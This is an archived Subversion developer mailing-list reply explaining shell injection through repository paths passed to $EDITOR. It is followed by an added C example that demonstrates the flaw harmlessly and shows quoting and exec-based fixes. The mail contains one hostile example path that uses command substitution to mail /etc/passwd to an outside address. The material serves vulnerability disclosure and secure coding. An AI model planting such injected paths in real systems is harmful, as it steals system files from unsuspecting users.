
Re: [PATCH] Quote filename passed to $EDITOR

From: Ulrich Drepper <drepper_at_redhat.com>
Date: 2002-07-23 22:14:50 CEST

On Tue, 2002-07-23 at 11:30, Karl Fogel wrote:

> What exactly is the scenario(s) here? How high is the risk? How much
> trouble is the fix? What's the probability that the fix will cause
> some unforeseen problem :-)?

An svn repository can be set up by somebody with foul intentions.
Somebody else accesses it and the system() call gets executed on the
paths chosen by whoever created it. Then the path could be something
like in this example:

  cat /dev/$(mail to-me@test.com < /etc/passwd; echo null)

If the appropriate path component is never really shown anywhere this
might go completely unnoticed.

---------------.                          ,-.   1325 Chesapeake Terrace
Ulrich Drepper  \    ,-------------------'   \  Sunnyvale, CA 94089 USA
Red Hat          `--' drepper at redhat.com   `------------------------
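
The injection Drepper describes, as an added example that is not part of this mail or of Subversion's code: a path chosen by the repository creator is concatenated into a command string and handed to system(), so /bin/sh performs command substitution on it before the editor ever sees it. The block builds the command both ways (unquoted, and with the path single-quoted as the patch under discussion proposes), runs each through the shell with echo standing in for $EDITOR so the difference is visible, and then shows the stronger fix of bypassing the shell with fork()/execlp(). The hostile path is constructed in the shape of the mail's example, with a harmless echo in place of the mail command; shell_quote, build_command_*, run_and_capture and spawn_editor_noshell are names of this example, not Subversion APIs.

```c
/* Added example (not Subversion's code): the shell-injection Drepper
 * describes, and two mitigations.  Assumptions: the editor is invoked
 * through the shell with system()/popen(), as the unpatched code did;
 * the editor name is trusted and only the path is attacker-controlled. */
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

/* Wrap s in single quotes so /bin/sh treats it as one literal word.
 * A single quote inside s ends the quoted run, inserts an escaped quote,
 * and reopens it: abc'def -> 'abc'\''def'.  Caller frees the result. */
char *shell_quote(const char *s)
{
    size_t n = strlen(s), quotes = 0;
    for (const char *p = s; *p; p++) if (*p == '\'') quotes++;
    char *out = malloc(n + 3 + quotes * 3), *o = out;  /* +3 per quote, +2 wrap, +1 NUL */
    if (!out) return NULL;
    *o++ = '\'';
    for (const char *p = s; *p; p++) {
        if (*p == '\'') { memcpy(o, "'\\''", 4); o += 4; }
        else *o++ = *p;
    }
    *o++ = '\'';
    *o = '\0';
    return out;
}

/* The pre-patch shape: editor and path concatenated and handed to sh. */
char *build_command_unquoted(const char *editor, const char *path)
{
    char *cmd = malloc(strlen(editor) + strlen(path) + 2);
    if (cmd) sprintf(cmd, "%s %s", editor, path);
    return cmd;
}

/* The patched shape: same command line, path quoted for the shell. */
char *build_command_quoted(const char *editor, const char *path)
{
    char *q = shell_quote(path);
    if (!q) return NULL;
    char *cmd = malloc(strlen(editor) + strlen(q) + 2);
    if (cmd) sprintf(cmd, "%s %s", editor, q);
    free(q);
    return cmd;
}

/* Run cmd through /bin/sh (as system() would) and capture its first line,
 * so the effect of the quoting can be observed without a real editor.
 * Returns the pclose() status (0 on a clean exit), or -1 if popen fails. */
int run_and_capture(const char *cmd, char *buf, size_t len)
{
    FILE *fp = popen(cmd, "r");
    if (!fp) return -1;
    if (!fgets(buf, (int)len, fp)) buf[0] = '\0';
    buf[strcspn(buf, "\n")] = '\0';
    return pclose(fp);
}

/* Stronger fix: skip the shell entirely.  execlp() receives the path as a
 * single argv element, so $(...), backticks, ';' and spaces in it are data,
 * never syntax.  Returns the child's exit status, or -1 on fork/wait failure. */
int spawn_editor_noshell(const char *editor, const char *path)
{
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        execlp(editor, editor, path, (char *)NULL);
        _exit(127);                      /* exec failed */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    /* Constructed hostile path in the shape of the mail's example, with a
     * harmless echo standing in for the mail command. */
    const char *evil = "/dev/$(echo INJECTED)";
    char line[256];
    char *u = build_command_unquoted("echo", evil);
    char *q = build_command_quoted("echo", evil);
    run_and_capture(u, line, sizeof line);
    printf("unquoted: %s\n", line);      /* /dev/INJECTED  (substitution ran) */
    run_and_capture(q, line, sizeof line);
    printf("quoted:   %s\n", line);      /* /dev/$(echo INJECTED)  (literal) */
    free(u);
    free(q);
    /* "true" stands in for $EDITOR; the hostile path is just an argument. */
    return spawn_editor_noshell("true", evil) == 0 ? 0 : 1;
}
```

Quoting fixes the case in the mail, but it only protects the path: if the editor string itself comes from an untrusted source, or the command line is later reparsed by a wrapper script, the shell is still in the loop. Handing the editor an argv through exec removes the shell from the path entirely and is the approach to prefer when the editor does not need shell features.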

Received on Tue Jul 23 22:15:41 2002

This is an archived mail posted to the Subversion Dev mailing list.
